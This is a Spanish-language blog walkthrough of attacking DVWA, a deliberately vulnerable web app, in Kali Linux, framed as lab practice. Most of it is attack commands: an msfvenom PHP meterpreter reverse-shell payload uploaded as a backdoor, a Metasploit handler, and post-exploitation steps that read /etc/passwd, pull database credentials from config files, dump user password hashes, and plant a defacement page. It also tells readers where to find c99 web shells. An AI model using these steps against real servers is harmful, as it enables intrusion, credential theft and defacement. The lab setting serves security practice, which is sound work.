ALGUNOS MÉTODOS DESARROLLADOS DE DVWA EN KALI LINUX PARTE 1 (File Upload, XSS)

Advertencia: “No todos los métodos los voy a publicar sobre todo los niveles de seguridad, porque es para que ustedes practiquen y no quiero hacer tanto spoiler para el mundo de la seguridad y cuando DVWA  se encarga de esto.”

Por las dudas de dejare mi post donde lo podes instalar. ” INSTALA EN UNA MAQUINA VIRTUAL DVWA “

Subir una SHELL

Existe muchos metodos que puedes usar en la clase baja la shell puede subir con .php sin problemas en la clase media usas “Burpsuite” para subir la shell en modo “.jpeg” “.png” y lo conviertes en .php.

Tienes un video.

Me preguntarás donde puedo conseguir una shell? Busca en google “c99.php” De allí empece luego un amigo me compartió su shell personalizada, existe muchas web que te ofrece eso. Te invito a que visites mi PASTEBIN

Pero no te preocupes puedes crear un backdoor y tener control de todo. Como?

 msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 R > /root/Desktop/xvideos.php

Screenshot from 2016-07-29 11-39-34

Te cuento: La IP es la victima de la victima osea de la misma IP que controla el server dvwa y los puertos 4444 lo demás es la ubicación donde guardarlo.
Usando el método de subir una shell simplemente subimos el “backdoor” y ejecutamos la consola con lo siguiente.

 service postgresql start
msfdb init
msfconsole
  use exploit/multi/handler
 set PAYLOAD php/meterpreter/reverse_tcp
 set LHOST 192.168.1.5
 set LPORT 4444
 exploit

Screenshot from 2016-07-29 11-32-24
Y ahora buscamos el backdoor y lo ejecutamos la “URL”
Que pasa? Tienes control a todo 3:)
Screenshot from 2016-07-29 11-46-30
Screenshot from 2016-07-29 11-46-59
Podemos colocar

 shell

Screenshot from 2016-07-29 11-51-06
Podemos controlar y obtener información.
También podemos ser creativos dejando un mensajito.

 echo "Hacked CreadPag.... Problem admin? security is bad Muaja muaja!!!" >xvideos.html

Screenshot from 2016-07-29 11-54-13
Veamos nuestra creatividad.
Podemos usar

tail /etc/passwd

Esto produce una lista perspectiva potencial para un ataque de fuerza bruta ssh.
Screenshot from 2016-07-29 11-56-18

 find /var/www/* -print | grep config

Aquí estoy queriendo encontrar todos los archivos de configuración en el directorio /var/www directory.
Explotar el archivo de configuración

 grep "db_" /var/www/html/dvwa/config/config.inc.php

Esto produce el nombre de la base de datos, nombre de usuario y la contraseña para iniciar sesión en la base de datos MySQL.

 echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD

Este comando produce una lista de tablas de la base de datos DVWA.

 echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD

Este comando se describen las columnas de la tabla de usuarios en la base de datos DVWA.

 echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD

Este comando muestra la información de usuario y contraseña para cada usuario en la tabla dvwa.users.
Screenshot from 2016-07-29 12-05-18
Si quieres llevarlo publicar toda esa data en .html en el mismo server seria así.

  • echo “<pre>” >> /var/www/html/dvwa/hackable/uploads/xss.html
  • echo “select user,password from dvwa.users;” | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
  • echo “</pre>” >> /var/www/html/dvwa/hackable/uploads/xss.html
  • echo “<br>Tu nombre <br>” >> /var/www/html/dvwa/hackable/uploads/xss.html
  • date >> /var/www/html/dvwa/hackable/uploads/xss.html

 

RESULTADO

 http://192.168.1.5/dvwa/hackable/uploads/xss.html

Vulnerability: Stored Cross Site Scripting (XSS) || Reflected Cross Site Scripting (XSS)

Todo fácil lo básico.

  • Screenshot from 2016-07-29 12-12-20AHORA NIVEL MEDIO
    Screenshot from 2016-07-29 12-15-28NIVEL ALTO

    Screenshot from 2016-07-29 12-38-54

Otro método en el nivel medio.

En el nivel hard o difícil vamos a escribir “creadpag”

Ahora te paso la captura de los código por problema al blog no permite copiar los siguientes códigos.

Screenshot from 2016-07-29 13-05-04
Bueno espero haberte ayudado. Y no te olvides de compartirlo, si veo que este post tiene gran visita voy por los métodos imposibles y más vulnerabilidades. Muchas gracias.